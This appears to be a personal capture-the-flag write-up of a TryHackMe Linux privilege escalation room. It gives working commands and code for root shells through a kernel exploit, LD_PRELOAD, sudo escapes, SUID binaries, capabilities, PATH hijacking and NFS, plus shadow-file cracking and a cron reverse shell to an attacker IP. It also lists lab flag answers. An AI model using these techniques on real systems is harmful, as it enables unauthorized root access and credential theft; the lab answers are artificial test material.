Learn the fundamentals of Linux privilege escalation. From enumeration to exploitation, get hands-on with over 8 different privilege escalation techniques.
hostname
uname -a
cat /etc/issue
python --version
searchsploit linux 3.13.0 Ubuntu 14.04
the answer is CVE-2015-1328
download the exploit
searchsploit -m 37292.c
we can see it can't create or write file on target system, but we can move to /tmp directory to do it
cd /tmp
transfer the exploit to target system
ifconfig
python3 -m http.server
on target system
wget 10.18.7.11:8000/37292.c
run the exploit
gcc 37292.c -o abc
id
./abc
id
| Flag | flag1.txt |
|---|---|
| Answer | THM-28392872729920 |
Leverage application functions
Some applications will not have a known exploit within this context. Such an application you may see is the Apache2 server.
In this case, we can use a "hack" to leak information leveraging a function of the application. As you can see below, Apache2 has an option that supports loading alternative configuration files (-f : specify an alternate ServerConfigFile).
Loading the /etc/shadow file using this option will result in an error message that includes the first line of the /etc/shadow file.
Leverage LD_PRELOAD
On some systems, you may see the LD_PRELOAD environment option.
The C code will simply spawn a root shell and can be written as follows;
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}We can save this code as shell.c and compile it using gcc into a shared object file using the following parameters
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
We can now use this shared object file when launching any program our user can run with sudo. In our case, Apache2, find, or almost any of the programs we can run with sudo can be used.
We need to run the program by specifying the LD_PRELOAD option, as follows
sudo LD_PRELOAD=/home/user/ldpreload/shell.so find
This will result in a shell spawn with root privileges.
okay, comeback to this task is about sudo command
sudo -l
flag2 is easy to get with no restriction
| Flag | flag2.txt |
|---|---|
| Answer | THM-402028394 |
How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?
sudo nmap --interactive
the next task is see hash of frank's password
and you can use nano, less, find with sudo
sudo nano
^R^X
reset; sh 1>&0 2>&0
or basically with less
sudo less /etc/shadow
You will notice these files have an “s” bit set showing their special permission level.
find / -type f -perm -04000 -ls 2>/dev/null will list files that have SUID or SGID bits set.
We see that the nano text editor has the SUID bit set by running the find / -type f -perm -04000 -ls 2>/dev/null command.
nano /etc/shadow will print the contents of the /etc/shadow file. We can now use the unshadow tool to create a file crackable by John the Ripper.
To achieve this, unshadow needs both the /etc/shadow and /etc/passwd files.
The unshadow tool’s usage can be seen below
unshadow passwd.txt shadow.txt > passwords.txt
With the correct wordlist and a little luck, John the Ripper can return one or several passwords in cleartext
The other option would be to add a new user that has root privileges. This would help us circumvent the tedious process of password cracking. Below is an easy way to do it:
We will need the hash value of the password we want the new user to have. This can be done quickly using the openssl tool on Kali Linux.
We will then add this password with a username to the /etc/passwd file.
Once our user is added (please note how root:/bin/bash was used to provide a root shell) we will need to switch to this user and hopefully should have root privileges.
back to task, we can see base64 is running as suid
cat /etc/passwd
What is the password of user2?
First we will need to find the password hashes for our passwd.txt file. Run base64 /etc/passwd | base64 --decode | tail -n4 in your terminal and copy the last bit into your passwd.txt file.
Next we will need to find the password hashes for our shadow.txt file. Run base64 /etc/shadow | base64 --decode | tail -n4 in your terminal and copy the last bit into your shadow.txt file.
Next, we need to unshadow our passwords
unshadow passwd.txt shadow.txt > passwords.txt
Finally we can use the John The Ripper tool to crack the password
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
We can use the same trick to see flag3
base64 /home/ubuntu/flag3.txt | base64 --decode
| Flag | flag3.txt |
|---|---|
| Answer | THM-3847834 |
list enabled capabilities
getcap -r / 2>/dev/null
We can see 6 binaries and other binary is view can be used through its capabilities
and we can use vim by its capability
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
| Flag | flag4.txt |
|---|---|
| Answer | THM-9349843 |
cat /etc/crontab
there are 4 cron jobs
i can see a file backup.sh
change the file content to bash -i >& /dev/tcp/<your_ip>/4444 0>&1'
run a listener by netcat
nc -vlnp 4444
I forgot to check if the script file was set to executable or not, and I kept waiting for the reverse shell and it never connected back
I wasted hours googling, modifying my bash shell, trying to figure out why my cron job script isn’t working. I was about to give up until I noticed the permissions…
chmod +x backup.sh
ok now we got the reverse shell with root privileges
| Flag | flag5.txt |
|---|---|
| Answer | THM-383000283 |
use the same trick to crack password of matt: 123456
search find wrireable folders under home
find / -writable 2>/dev/null | grep home
we can see 3 folders in home
i found flag6 is under folder matt, but let see what on folder murdoch
we see that it is dependent on thm, so that means we will need to create a thm file and write a little script to read the contents of flag6.txt
echo "cat /home/matt/flag6.txt" > thm
chmod +x thm
export PATH=/home/murdoch:$PATH
now enable the script
./test
| Flag | flag6.txt |
|---|---|
| Answer | THM-736628929 |
enumerate mountable shares from our attack machine
showmount -e 10.10.226.120
cat /etc/exports
create a folder to work on our machine
mkdir /tmp/THM
cd /tmp/THM
i will mount with /tmp shared folder
sudo mount -o rw 10.10.226.120:/home/ubuntu/sharedfolder /tmp/THM
now we can see the files are present on both the machines here
vi nfs.c
#include <stdio.h>
#include <stdlib.h>
int main() {
setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}gcc nfs.c -o nfs -w
chmod +s nfs
ls -l
You have now root access and can run
./nfs
You will see below that both files (nfs.c and nfs are present on the target system. We have worked on the mounted share so there was no need to transfer them).
cat /home/matt/flag7.txt
| Flag | flag7.txt |
|---|---|
| Answer | THM-89384012 |
Look an overview, there is an empty folder
enumeration
find / -type f -perm -04000 -ls 2>/dev/null
i see base64 can use with SUID
now we will use base64 to unshadow /shadow and /passwd data
base64 /etc/shadow | base64 -d
base64 /etc/passwd | base64 -d
and copy the password hash to 2 files
now crack the password
sudo unshadow passwd.txt shadow.txt > cracked.txt
john --wordlist=/usr/share/wordlists/rockyou.txt cracked.txt
john --show cracked.txt
switch to missy with Password1
sudo -l -l
now we can find our 2 flags location with sudoer
sudo find / -name *flag*.txt
cat the flag1
| Flag | flag1.txt |
|---|---|
| Answer | THM-42828719920544 |
now we need root access to see rootflag
that is very easy with
sudo find . -exec /bin/sh \; -quit
| Flag | flag2.txt |
|---|---|
| Answer | THM-168824782390238 |